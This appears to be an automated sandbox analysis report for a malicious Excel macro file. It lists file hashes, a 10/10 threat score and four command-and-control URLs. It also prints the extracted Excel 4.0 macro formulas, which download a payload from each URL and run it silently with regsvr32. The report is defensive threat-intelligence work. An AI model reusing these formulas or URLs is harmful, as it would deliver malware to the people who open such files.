Overview

overview

10

Static

static

10

582476.xlsm

windows7-x64

10

582476.xlsm

windows10-2004-x64

1

Sharing

Copy URL Twitter E-mail

General

  • Target

    582476.xlsm

  • Size

    228KB

  • MD5

    5949de004e34883d4c9f638d16a2bea4

  • SHA1

    59901ba23c32eee1dfc15cc2ea93b4caa8477118

  • SHA256

    6fa01dcf027dcdc6d59d16e4ebc4a5b29a9ab3672039a8292c9b3f8086f0cf9d

  • SHA512

    cef730b353733c1e0bd776a12fe8e11085dec92da5923f42ad74ce91422639754492d77f31784c93f463ebbe57e40e2cc8bbb113e85b53839d46995bd05bc077

  • SSDEEP

    6144:6Xi2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyb:6Xi2LDHf9PH5XUqRLTyb

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://datie-tw.com/img/SvH/

http://central-nutrition.com/wp-content/Nh1L6YR4qlDFWS58cVB/

http://championsfactorysampaios.com.br/xt5HKu/tDs8WsKOxQFq/

https://dacsandongthapmuoi.vn/system/cron/HwOtNCFo/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://datie-tw.com/img/SvH/","..\oxnv1.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://central-nutrition.com/wp-content/Nh1L6YR4qlDFWS58cVB/","..\oxnv2.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://championsfactorysampaios.com.br/xt5HKu/tDs8WsKOxQFq/","..\oxnv3.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dacsandongthapmuoi.vn/system/cron/HwOtNCFo/","..\oxnv4.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 582476.xlsm
    .xlsm office2007